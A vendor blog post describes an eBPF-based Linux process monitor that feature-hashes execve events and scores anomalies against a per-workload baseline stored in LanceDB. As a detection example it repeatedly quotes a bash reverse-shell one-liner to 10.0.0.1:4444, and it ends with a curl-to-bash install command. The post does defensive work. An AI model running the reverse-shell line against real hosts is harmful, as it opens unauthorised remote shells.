Gretl

Posted on May 24

Detecting unusual processes on your servers without writing a single rule

#linux #machinelearning #monitoring #security

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.

The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.

Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF
eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires on entry to every execve system call on the machine, before the new program has started running.

For each execution we capture:

The process name (comm) and full command line (argv)
The parent process name
The UID of the calling process
Any active network connections (src/dst IP, port)
This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

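#[tracepoint]
pub fn gretl_execve(ctx: TracePointContext) -> u32 {
    // The entry point returns a plain integer, so the fallible body lives in a helper.
    match try_gretl_execve(&ctx) {
        Ok(ret) => ret,
        Err(_) => 1,
    }
}

fn try_gretl_execve(ctx: &TracePointContext) -> Result<u32, i64> {
    // Offset 16 holds the filename pointer in the sys_enter_execve record;
    // it is read here as a u64 (pointer-sized on 64-bit kernels).
    let filename_ptr = unsafe { ctx.read_at::<u64>(16)? } as *const u8;
    let pidtgid = bpf_get_current_pid_tgid();
    let pid = (pidtgid >> 32) as u32; // upper 32 bits are the tgid, i.e. the userspace PID

    let mut event = ExecveEvent {
        pid,
        comm:     [0u8; 16],
        filename: [0u8; 64],
        argv1:    [0u8; 64],
        // ...
    };

    if let Ok(comm) = bpf_get_current_comm() {
        event.comm = comm;
    }

    Ok(emit_execve(&event))
}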
The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code.
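The batching step on the userspace side can be sketched in a few lines. This is a minimal illustration, not the agent's actual code: the EventBatcher class, the ExecEvent shape, and the buffer cap are all hypothetical, and the HTTP POST itself is left to the caller.

```typescript
// Hypothetical event shape; the real agent's fields may differ.
interface ExecEvent {
  pid: number;
  comm: string;
  filename: string;
}

// Buffers events between flushes. Names and the cap are illustrative.
class EventBatcher {
  private pending: ExecEvent[] = [];
  private readonly maxPending: number;

  constructor(maxPending: number = 10000) {
    this.maxPending = maxPending;
  }

  // Adds one event, dropping the oldest if the buffer is full.
  push(event: ExecEvent): void {
    if (this.pending.length >= this.maxPending) {
      this.pending.shift();
    }
    this.pending.push(event);
  }

  // Returns everything buffered so far and starts a fresh batch.
  drain(): ExecEvent[] {
    const batch = this.pending;
    this.pending = [];
    return batch;
  }

  // Puts a batch back at the front, e.g. after a failed POST,
  // keeping only the newest events if the cap would be exceeded.
  requeue(batch: ExecEvent[]): void {
    this.pending = batch.concat(this.pending).slice(-this.maxPending);
  }
}
```

In an agent this would typically be driven by a 60-second timer that drains the batcher, POSTs the result, and calls requeue if the request fails.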

For servers without eBPF support, the Node.js agent falls back to reading /proc/<pid>/cmdline and /proc/<pid>/status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.
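The /proc fallback boils down to three small steps: list the numeric entries under /proc, diff them against the previous interval, and parse the command line of each new PID. The sketch below shows only the pure logic, with hypothetical function names; the actual file reads are left out so the parsing is easy to test in isolation.

```typescript
// Picks the numeric entries (PIDs) out of a /proc directory listing.
function pidsFromProcEntries(entries: string[]): number[] {
  return entries.filter((name) => /^\d+$/.test(name)).map(Number);
}

// Returns PIDs present now that were not present in the previous interval.
function newPids(previous: Set<number>, current: number[]): number[] {
  return current.filter((pid) => !previous.has(pid));
}

// /proc/<pid>/cmdline stores argv as NUL-separated strings,
// usually with one trailing NUL.
function parseCmdline(raw: string): string[] {
  if (raw.length === 0) return []; // kernel threads have an empty cmdline
  const trimmed = raw.endsWith("\0") ? raw.slice(0, -1) : raw;
  return trimmed.split("\0");
}
```

One limitation of any polling approach like this: a process that starts and exits between two polls is never observed, which is the main thing the eBPF path buys you.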

Step 2: Represent each process execution as a vector
The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.

We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.

function featureVector(event: ProcessEvent): number[] {
  const vec = new Float32Array(128);

  const tokens = [
    event.process_name,
    event.parent_process,
    event.event_type,
    String(event.local_port),
    String(event.remote_port),
    ...tokenise(event.cmdline), // split cmdline into meaningful tokens
  ];

  for (let i = 0; i < tokens.length; i++) {
    const t = tokens[i].toLowerCase().trim();
    if (!t) continue;
    // The seed depends on i, so the same token at a different position
    // lands in a different bucket.
    const idx = hashStr(t, i * 31) % 128;
    const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1;
    vec[idx] += sign;
  }

  // L2 normalise so cosine distance is well-defined
  let norm = 0;
  for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];
  norm = Math.sqrt(norm) || 1;
  return Array.from(vec).map(v => v / norm);
}
Feature hashing is deterministic, requires no external model, adds negligible latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.
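The featureVector() snippet calls two helpers, hashStr and tokenise, that aren't shown. Here is one way they could look. This is a guess at their shape rather than the real implementation: the seeded FNV-1a hash and the split characters are both assumptions.

```typescript
// Seeded 32-bit FNV-1a. Returns an unsigned integer, so `% 128` is never negative.
// Assumption: the real hashStr may use a different hash function entirely.
function hashStr(s: string, seed: number): number {
  let h = (0x811c9dc5 ^ seed) >>> 0; // FNV offset basis mixed with the seed
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // multiply by the FNV prime, mod 2^32
  }
  return h;
}

// Splits a command line on whitespace and common shell punctuation.
// Assumption: the separator set is illustrative, not the article's.
function tokenise(cmdline: string): string[] {
  return cmdline.split(/[\s=:,;|&<>()'"]+/).filter((t) => t.length > 0);
}
```

With these definitions, tokenise("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1") yields bash, -i, /dev/tcp/10.0.0.1/4444, 0 and 1. The path stays a single token, so splitting on / as well would be a reasonable variation if you want /dev/tcp to match across different targets.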

Why not use a neural embedding model?
We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.

The problem is the operational cost at ingestion time. Each agent reports a batch of process events roughly every 60 seconds. For a fleet of 50 servers that's ~3,000 batches per hour, and every event in every batch needs an embedding call before it can be scored and stored. The options were:

Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.
External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.
Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.
For this specific input (structured fields like process names, parent process names, and cmdline tokens), feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.
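To make that swap safe, it helps to pin down what the rest of the pipeline expects from an embedder: a fixed output length and a unit-length vector. The sketch below is one way to enforce that contract. The Embedder interface and embedChecked function are hypothetical names, not part of the codebase described here.

```typescript
// Hypothetical contract for anything that can stand in for featureVector().
interface Embedder<E> {
  dims: number;
  embed: (event: E) => number[];
}

// Runs the embedder, then enforces the two properties the scorer relies on:
// a fixed length and unit L2 norm.
function embedChecked<E>(embedder: Embedder<E>, event: E): number[] {
  const raw = embedder.embed(event);
  if (raw.length !== embedder.dims) {
    throw new Error(`expected ${embedder.dims} dims, got ${raw.length}`);
  }
  let norm = 0;
  for (const v of raw) norm += v * v;
  norm = Math.sqrt(norm) || 1; // all-zero vectors are left as zeros
  return raw.map((v) => v / norm);
}
```

One caveat worth planning for: a model with a different output size (384 dims instead of 128, say) would most likely need fresh tables, since vectors of different lengths can't be compared with the existing baseline.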

Step 3: Store and query with LanceDB
LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.
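Table naming and the 7-day pruning could look roughly like this. It is a sketch under stated assumptions: the naming scheme is hypothetical, and PrunableTable is a minimal stand-in that assumes the table accepts an SQL-style filter string in delete(), as LanceDB's JavaScript SDK does.

```typescript
// Only the method this sketch needs (assumed to take an SQL-style filter).
interface PrunableTable {
  delete(predicate: string): Promise<unknown>;
}

const RETENTION_MS = 7 * 24 * 60 * 60 * 1000; // the 7-day window from the text

// Hypothetical naming scheme: lower-case, with unsafe characters replaced.
// Note that distinct inputs such as "a-b" and "a_b" would collide.
function tableName(org_id: string, workload: string): string {
  return `${org_id}__${workload}`.toLowerCase().replace(/[^a-z0-9_]/g, "_");
}

// Builds the filter matching rows older than the retention window.
function prunePredicate(nowMs: number): string {
  return `ts < ${nowMs - RETENTION_MS}`;
}

// Deletes expired rows from one workload table.
async function pruneOld(
  table: PrunableTable,
  nowMs: number = Date.now(),
): Promise<void> {
  await table.delete(prunePredicate(nowMs));
}
```

Running pruneOld on a schedule (hourly, for example) rather than on every ingest keeps deletes off the hot path.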

export async function scoreAndLearn(
  org_id: string,
  workload: string,
  event: ProcessEvent,
): Promise<number> {
  const conn = await db();
  const table = await getOrCreateTable(conn, tableName(org_id, workload));
  const vec = featureVector(event);

  // Find k=10 nearest neighbours in this workload's history
  const results = await table.vectorSearch(vec).limit(10).toArray();

  let score = 1.0; // default: completely unseen
  if (results.length > 0) {
    const distances = results.map(r =>
      cosineDistance(vec, Array.from(r.vector))
    );
    const minDist = Math.min(...distances);
    score = Math.min(1, minDist * 2); // scale to 0–1
  }

  // Add this event to the baseline for future comparisons.
  // Awaited so a failed write surfaces here instead of as an unhandled rejection.
  await table.add([{ vector: vec, ts: Date.now() }]);

  return score;
}
The anomaly score is close to 0 when the event closely matches something already in the baseline, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.
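The scoring arithmetic is easier to reason about in isolation. The sketch below gives one plausible cosineDistance (it is not shown in the article) and pulls the min-distance scaling from scoreAndLearn into a hypothetical anomalyScore helper that works on plain arrays.

```typescript
// Cosine distance: 0 for identical direction, 1 for orthogonal, 2 for opposite.
function cosineDistance(a: number[], b: number[]): number {
  const n = Math.min(a.length, b.length);
  let dot = 0;
  let na = 0;
  let nb = 0;
  for (let i = 0; i < n; i++) {
    dot += a[i] * b[i];
    na += a[i] * a[i];
    nb += b[i] * b[i];
  }
  if (na === 0 || nb === 0) return 1; // treat a zero vector as unrelated
  return 1 - dot / Math.sqrt(na * nb);
}

// Distance to the closest neighbour, doubled and clamped to the 0..1 range.
function anomalyScore(vec: number[], neighbours: number[][]): number {
  if (neighbours.length === 0) return 1; // nothing in the baseline yet
  let minDist = Infinity;
  for (const nb of neighbours) {
    minDist = Math.min(minDist, cosineDistance(vec, nb));
  }
  return Math.min(1, Math.max(0, minDist * 2));
}
```

Because of the doubling, the score saturates at 1 once the nearest neighbour is at cosine distance 0.5 or more. And because only the single closest neighbour counts, one exact prior occurrence is enough to bring the score to 0.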

Step 4: Natural language search
Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

// In the dashboard Security tab:
// "show me anything that looks like a reverse shell"

POST /telemetry/security/search
{ "query": "reverse shell bash outbound connection" }
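This returns the events whose vectors are closest to the query vector, so results are ranked by overall similarity rather than filtered by exact string matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 can rank highly even though it doesn't contain the literal words "reverse shell". With feature hashing, that closeness comes from overlapping tokens rather than from any understanding of meaning, so queries work best when phrased in the same technical vocabulary as the events.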
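Searching across all workload tables means running one nearest-neighbour query per table and then merging the results into a single ranking. A minimal sketch of that merge step follows; the SearchHit shape and mergeTopK name are hypothetical.

```typescript
// Hypothetical result row: which workload it came from and how far it is
// from the query vector (smaller is closer).
interface SearchHit {
  workload: string;
  eventId: string;
  distance: number;
}

// Combines per-table results and keeps the k closest overall.
function mergeTopK(perTable: SearchHit[][], k: number): SearchHit[] {
  const all: SearchHit[] = [];
  for (const hits of perTable) {
    all.push(...hits);
  }
  all.sort((a, b) => a.distance - b.distance);
  return all.slice(0, k);
}
```

This only ranks fairly if every table uses the same embedding and the same distance metric, which holds here because all vectors come from the same feature-hashing function.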

What it looks like in practice
After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:

A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn
Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run
Someone runs curl | bash as root → score 0.94, flagged immediately
Your usual nginx worker restarts → score 0.02, ignored
No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram
Server                      Backend                        Storage
──────                      ───────                        ───────

eBPF (kernel)  ──execve──▶  /otlp/v1/events
                                  │
/proc fallback ──────────▶        │
                                  ▼
                            featureVector()
                                  │
                                  ▼
                            LanceDB (per workload) ──▶ anomaly_score
                                  │
                                  ▼
                            ClickHouse.security_events
                                  │
                                  ▼
                            Dashboard + NL search

What's next
The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.
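Per-workload thresholds could be as simple as a lookup with a fallback. The sketch below uses the 0.6 and 0.85 values from the paragraph above. The workload names, the default of 0.75, and the shouldAlert function are all made up for illustration.

```typescript
// Assumed fallback for workloads with no explicit setting.
const DEFAULT_ALERT_THRESHOLD = 0.75;

// Hypothetical workload names; thresholds taken from the text above.
const alertThresholds = new Map<string, number>([
  ["prod-payments", 0.6], // security-sensitive: alert early
  ["dev-sandbox", 0.85], // noisy: alert only on strong anomalies
]);

// True when the score meets or exceeds the workload's threshold.
function shouldAlert(
  workload: string,
  score: number,
  thresholds: Map<string, number> = alertThresholds,
): boolean {
  const threshold = thresholds.get(workload) ?? DEFAULT_ALERT_THRESHOLD;
  return score >= threshold;
}
```

With these settings, a score of 0.72 alerts on prod-payments but stays quiet on dev-sandbox.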

Try it on your servers
The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh)
